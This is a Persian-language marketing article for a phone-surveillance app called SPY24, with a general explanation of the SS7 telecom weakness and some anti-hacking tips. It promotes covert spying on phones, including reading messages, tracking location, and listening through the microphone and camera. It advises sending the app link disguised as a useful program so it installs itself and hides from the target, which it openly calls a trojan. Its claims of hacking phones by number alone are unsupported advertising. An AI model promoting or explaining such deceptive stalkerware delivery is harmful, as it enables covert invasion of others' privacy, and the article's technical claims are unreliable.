در گذشته مردم بر روی دسترسی به Voice Mail یا صندوق پست صوتی دیگران که کاربران ایرانی اکنون به ندرت از آن استفاده می کنند، متمرکز بودند.

یا حتی تا همین چندسال پیش که اپلیکیشن هایی مانند تلگرام، هاتگرام، وایبر، واتس اپ و… وجود نداشت، دغدغه خواندن پیامکهای گوشی اطرافیان در بین افراد دیده می شد.

چنین کاری یعنی نقض حریم خصوصی اشخاص به هر طریقی مانند نصب نرم افزاری برای دسترسی به اس ام اس های دیگران که باعث ایجاد نارضایتی و شاکیانی می شود و به همین علت هم قانون در این زمینه بسیار پیگیر خواهد بود.

اما نکته مهم در زمینه هک و نظارت این است که چه کسی و با چه هدفی چنین کاری را انجام می دهد؟ آیا فرد هکر برای خواندن پیام های گوشی همسر خود اقدام به چنین کاری می کند یا یک مادر یا پدر به خاطر مراقبت و نظارت بر فرزندان خود در فضای مجازی و پیشگیری از مشکلاتی که ممکن است در این فضا برای آنان پیش بیاید اقدام به نصب برنامه هک گوشی می کند؟ این بحثی است که قانونی یا غیر قانونی بودن عمل هک را مشخص می کند.

به طوری که اگر قصد شما از دانلود برنامه هک گوشی ، کنترل فرزندانتان در فضای مجازی باشد مشکلی نیست، اما در غیر این صورت این کار به جهت نفوذ به حریم خصوصی افرادی که هیچ گونه سرپرستی بر آنها نداریم کاملا غیر اخلاقی و نقض آشکار قانون خواهد بود.

هک چیست

چطور می توان کنترل گوشی از را دور را به دست گرفت؟

راه های بسیاری برای کنترل گوشی از راه دور ارائه شده است .

اما راحت ترین و ساده ترین راه برای هک کردن گوشی فرد مورد نظر شما، دسترسی به گوشی آن شخص و نصب برنامه هک روی آن گوشی خواهد بود.

بخاطر پیچیدگی کم این روش و نیاز نداشتن به یادگیری دانش برنامه نویسی، میگوییم ساده ترین راه حل برای کنترل گوشی بدون اجازه افراد می باشد.

اما اگر بخواهیم بدون دسترسی و از طریق شماره تلفن اقدام به هک گوشی فرزند و یا اعضای خانواده یا اشخاص دیگری کنیم، باید بگوییم که این کار به دانش شما در زمینه برنامه نویسی و حتی در زمینه نصب برنامه هک گوشی با شماره بستگی دارد.

آیا هک شماره تلفن امکان پذیر است؟

این که آیا هک شماره تلفن یا اصلا هک گوشی امکان پذیر است یا خیر، سوالی است که در ذهن بسیاری از افرادی که قصد انجام این کار را دارند ایجاد می شود.

در پاسخ به این سوال بدون اینکه بخواهیم شما را گیج کنیم، باید بگوییم که بله، هک گوشی و هک شماره موبایل و همچنین دانلود برنامه هک از طریق شماره همه امکان پذیر هستند و تا به حال افراد زیادی درگیر این موضوع بوده اند و هستند، که به نتایج قابل توجهی نیز در این حیطه رسیده اند..

هک از طریق شماره تلفن از سرویس شبکه تبادل به اسم Signalling System No. 7 -SS7 – استفاده می‌کند که در انگلستان C7 و در آمریکا CCSS7 نامیده می‌شود و به‌عنوان واسطه بین شبکه‌های تلفن همراه عمل خواهد کرد.

هنگام برقراری تماس یا فرستادن پیام‌های متنی در شبکه SS7، جزییاتی مانند شماره، انتقال پیام، پرداخت صورت‌حساب و سایر اقدامات، یک شبکه یا تماس‌گیرنده را به دیگری وصل می‌کند.

با هک کردن از طریق سیستم SS7 و با استفاده از شماره تلفن فرد مورد نظر، یک مهاجم می‌تواند مکان شخص را از طریق تلفن همراه ردیابی کند، پیام‌های فرستاده‌شده و دریافت‌شده را بخواند و تماس‌های تلفنی را گوش دهد و آنها را ضبط کند و اطلاعات دیگر گوشی تلفن همراه را بدست آورد.

این آسیب پذیری بر روی تلفن گوشی همراه شما نیست و در واقع در زیرساختارهای مخابراتی و تلفنی وجود دارد ، نصب کردن یا جلوگیری از نصب هرگونه نرم افزار بر روی گوشی نمی تواند در روند کاری این آسیب پذیری مشکلی ایجاد کند ، در واقع این شبکه Mobile است که هک می شود نه گوشی تلفن همراه شما ، قطعا شما با شنیدن این موضوع هم وحشت زده می شوید و هم خشمگین ، چراکه بدون اینکه بدانید ممکن است از تلفن همراه شما جاسوسی شده باشد.

نوهل کارشناس زبده آلمانی در ادامه سخنانش اعلام کرد که با این روش تقریبا همه تلفن های همراه را می توان هک کرد ، فارق از اینکه شما از چه برندی استفاده می کنید.

هکر می تواند با استفاده از این روش حسابهای بانکی شما ، تمام اطلاعات گوشی شما .

موقعیت مکانی شما . حسابهای ایمیلی و .. شما را هک کند زیرا اکثر مکانیزم های امنیتی Two Factor Authentication یا احراز هویت دو منظوره از تلفن همراه برای اینکار استفاده می کنند.

چگونه می توان دانلود برنامه هک از طریق شماره تلفن را انجام داد؟

تا به اینجا متوجه شدید که امکان هک گوشی با شماره و البته دانلود برنامه هک از طریق شماره وجود دارد، اما سوالی که پیش می آید این است که چگونه می توان این کار را انجام داد و چه روش هایی برای این کار وجود دارد؟

برای انجام این کار روش های زیادی وجود دارد که البته بیشتر آنها نیازمند یادگیری زبان های برنامه نویسی هستند.

فراگیری زبان های برنامه نویسی اصلا کار ساده ای نیست و به زمان زیادی نیاز دارد که به همین دلیل هم بسیاری از افراد از این کار منصرف می شوند.

اما خوشبختانه برنامه نویسان حرفه ای در سطح دنیا نرم افزارهایی را برای هک گوشی طراحی و در اختیار عموم قرار داده اند که با استفاده از آنها به راحتی می توان به هک گوشی دیگران پرداخت.

برنامه spy24 نیز یکی از برنامه هایی است که با هدف نظارت بر فرزندان در فضای مجازی توسط سامانه کنترل فرزند طراحی و عرضه شده است.

این برنامه در چند نسخه با قابلیت های متفاوت ارائه شده است که هک گوشی را هم با دسترسی و هم بدون دسترسی و از طریق شماره تلفن برای شما انجام می دهد.

آسیب پذیری  که با برنامه SS7 spy24 انجام می شود، تقریبا جدید است و در آگوست ۲۰۱۵ این آسیب پذیری گزارش شده است ، جالب اینجاست بدانید که این آسیب پذیری در زیرساخت مخابراتی وجود دارد که در بیش از ۸۰۰ شرکت ارتباطی در دنیا مورد استفاده قرار می گیرد.

با دانلود برنامه هک از طریق شماره spy24 می توانید کنترل گوشی فرزند خود را به دست گرفته و نظارت کاملی بر فعالیت های او داشته باشید.

این برنامه به شما امکان مشاهده موقعیت مکانی به صورت لحظه به لحظه، مشاهده پیامک های دریافتی و ارسالی، لیست تماس ها، مخاطبین و تمام تصاویر موجود در گالری را می دهد.

همچنین در نسخه جدید این برنامه که با نام spy24 منتشر شده است، قابلیت شنود مکالمات و مشاهده تصاویر اطراف توسط دوربین گوشی فرزند نیز اضافه شده است.

این نسخه را هم می توانید در صورت دسترسی در گوشی فرزند نصب کنید و هم می توانید لینک برنامه را برای فرزندتان با نام یک برنامه مفید ارسال کنید و از او بخواهید بر روی لینک کلیک کند، به محض کلیک فرزند، برنامه به طور خودکار نصب شده و سپس از لیست برنامه های گوشی حذف می شود تا فرزند متوجه تروجان بودن برنامه نشود.

در صورت تمایل به کسب اطلاعات بیشتر و یا دانلود برنامه هک از طریق شماره می توانید بر روی لینک قرمز رنگ زیر کلیک نمایید.

هک با شماره موبایل با نرم افزار SPY24

برنامه SPY24 :

که اولین مورد از قوانین سایت و مهمترین آن مقابله با هک میباشد و هر گونه سو استفاده و استفاده نادرست از آموزش ها و برنامه های وبسایت SPY24 بر عهده کاربر می باشد.

سامانه مراقبت از خانواده (SPY24) نام یک نرم افزار موبایل با نصب و فعال‌سازی بسیار ساده می باشد که به والدین امکان کنترل و مدیریت فعالیت فرزندان در شبکه های مجازی موبایلی را می دهد.

در زیر می توانید برخی از امکانات برنامه SPY24 را مشاهده نمایید:

  • نظارت بر تماس ها و پیامک ها به همراه تاریخ و زمان
  • گزارش پیام های تلگرام ، اینستاگرام ، واتس اپ و…
  • موقعیت لحظه مستمر و مسیر های پیموده شده
  • وب سایت های بازدید شده و برنامه های اجرا شده
  • با قابلیت پنهان سازی ۱۰۰ درصد برنامه و مدیرت راه دور
  • امکان مسدود سازی وب سایت ها، برنامه ها و مخاطبین از راه دور

هک کردن تلفن همراه با پاسخ دادن به یک شماره خاص ممکن نیست/قسمت دسترسی هر برنامه باید کنترل شود/بهترین راه مقابله با هک نصب آنتی ویروس است

دست به دست شدن شایعه هک تلفن همراه پس از پاسخگویی به شماره تماس هایی از یک شماره خاص چند روزی است که در فضای مجازی دست به دست می شود و موجب نگرانی بسیاری از شهروندان شده است.

کارشناس امنیت شبکه وب سایت SPY24 : در این خصوص گفت: این امکان وجود ندارد که صرفا با جواب دادن یک تماس تلفنی، تلفن همراه مقصد هک شود و یا به اطلاعات موبایل دسترسی پیدا کرد و این شایعه با اهدافی خاص از سوی برخی سودجویان طراحی شده است.

او افزود: احتمال دارد برخی با شهروندان تماس بگیرند و از طریق مهندسی اجتماعی بخواهند در حین تماس تلفنی اقداماتی شهروندان روی تلفن همراه خود انجام دهند اما صرفا با پاسخگویی تلفن همراه چنین مقوله ای ممکن نیست. با توجه به امکاناتی که روی تلفن های هوشمند وجود دارد این امر امکان پذیر نیست.

کارشناس امنیت شبکه وب سایت SPY24 : در رابطه با تلفن های غیرهوشمند نیز اظهار کرد: بحث دسترسی و کنترل از راه دور برای تلفن های همراه هوشمند مطرح است و تلفن های ساده سیستم آن ها به گونه ای نیست که قابل هک باشند بنابراین شهروندان در این زمینه نباید نگران شوند.

این مقام انتظامی با تشریح این قبیل کلاهبرداری ها افزود: شخص سو استفاده گر ممکن است یک سری اطلاعات از راه های مختلف جمع آوری و دو سه مشخصه محدود از یک شهروند را در اختیار داشته باشد که در حین تماس این اطلاعات را مطرح می کند و عنوان می کند که تلفن همراه شما هک شده است در صورتیکه این اطلاعات را از طریقی دیگر به دست آورده و با سواستفاده از این اشرف مخاطبش را مجبور به اقداماتی می کند.

او تصریح کرد: بنابراین صرفا با یک تماس ساده اتفاقی رقم نمی خورد بلکه با یک عملیات مهندسی مخاطب خود را مجاب می کند تا اقداماتی انجام دهند تا با اراده اقدامی صورت بگیرد برای مثال یک درخواست بر روی تلگرام و یا واتس آپ شما ارسال می کند و از شما می خواهد آن را تایید کنید. این امر در ظاهر برای شما بدون مشکل است اما بر روی صفحاتی دیگر برنامه ریزی شده است همچون برداشت غیرمجاز از حساب که در آنجا نیز این امر اتفاق می افتد. 

کارشناس امنیت شبکه وب سایت SPY24 : این یک فرایند پیچیده است. اشخاصی که از تلفن همراه استفاده می کنند ضرورت دارد تا سواد استفاده از آن را نیز فرا گیرند. شهروندان در وهله اول قسمت دسترسی هر برنامه را چک کنند که آن برنامه به اطلاعات اضافی دسترسی نداشته و اختیاراتی فراتر از حد معمول نداشته باشد.

این کارشناس حوزه سایبری خاطرنشان کرد: مردم هر برنامه ای را بر روی تلفن همراه خود نصب نکنند زیرا برخی از این برنامه ها دو بخشی است و یک بخش آن توسط کاربر و بخش دیگر از راه دور فعال می شود و از این طریق اطلاعات افراد به سرقت می رود.

او ادامه داد: اگر تلفن همراه شخص باتری و یا اینترنت زیادی مصرف می کند به معنای هک شدن تلفن همراه نیست. در این قبیل شواهد از طریق برنامه ای که نصب شده است یک سری اطلاعات محدود جا به جا می شود اما تلفن همراه هک نشده است.

کارشناس امنیت شبکه وب سایت SPY24 : شهروندان حتما بر روی تلفن همراه خود یک ضد ویروس معتبر نصب کنند. این یک راه موثر برای جلوگیری از هک شدن تلفن همراه است. سایت ها و برنامه های مشکوک را شهروندان به هیچ وجه باز نکنند زیرا به سرعت می تواند اطلاعات تلفن همراه فرد را به سرقت ببرد.

نقص یا آسیب پذیری SS7 چگونه کار می کند ؟

مکانیزم کاری این نقص امنیتی چندان پیچیده نیست ، هکر تمامی تماس های تلفنی که به تلفن مورد نظر انجام می شود را به یک دستگاه یا سیستم ضبط صدای آنلاین هدایت یا Route می کند و سپس تماس مورد نظر را به سمت کاربر تلفن همراه مسیریابی مجدد یا Re-Route می کند و به این ترتیب یکجور حمله از نوع Man In The Middle یا MITM انجام می دهد.

در صورت هک شدن به این روش هکر می تواند کوچکترین حرکت کاربر را شناسایی و با استفاده از سایر ابزارهای هکی که در اختیار دارد تمامی فعالیت های کاربر را جاسوسی کند. جالب اینجاست بدانید که نوهل اعلام کرده است که این آسیب پذیری امنیتی در سیستم های اطلاعاتی وجود داشته است و سرویس های جاسوسی و امنیتی دنیا از چنین آسیب پذیری اطلاع داشته اند و بعضا از آن استفاده نیز نی کرده اند ، قبلا در SPY24 در خصوص پروژه هایی مانند Echelon صحبت کرده ایم که تمامی دنیا توسط آمریکا شنود اطلاعاتی می شده است اما استفاده از تجهیزات مخابراتی وابسته نیز طبیعتا تبعات امنیتی به این شکل خواهد داشت.

راهکار مقابله با SS7 چیست ؟

شما هیچککاری در خصوص این حمله نمی توانید انجام دهید و سرویس های مخابراتی و زیرساختی بایستی برای برطرف کردن این موضوع اقدام کنند ، با توجه که در جریان زیرساخت های مخابراتی ایران و تلفن های همراه آن به شخصه نیستم امیدوارم که شرکت های اپراتور ایرانی از آن دسته از شرکت هایی نباشند که از این آسیب پذیری استفاده می کنند. نظرات در این خصوص با رعایت احترام و ذکر دلایل فنی مجاز است.

keleis andre

برنامه ردیابی و کنترل نامحسوس گوشی موبایل و تبلت از راه دور

یک دیدگاه

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا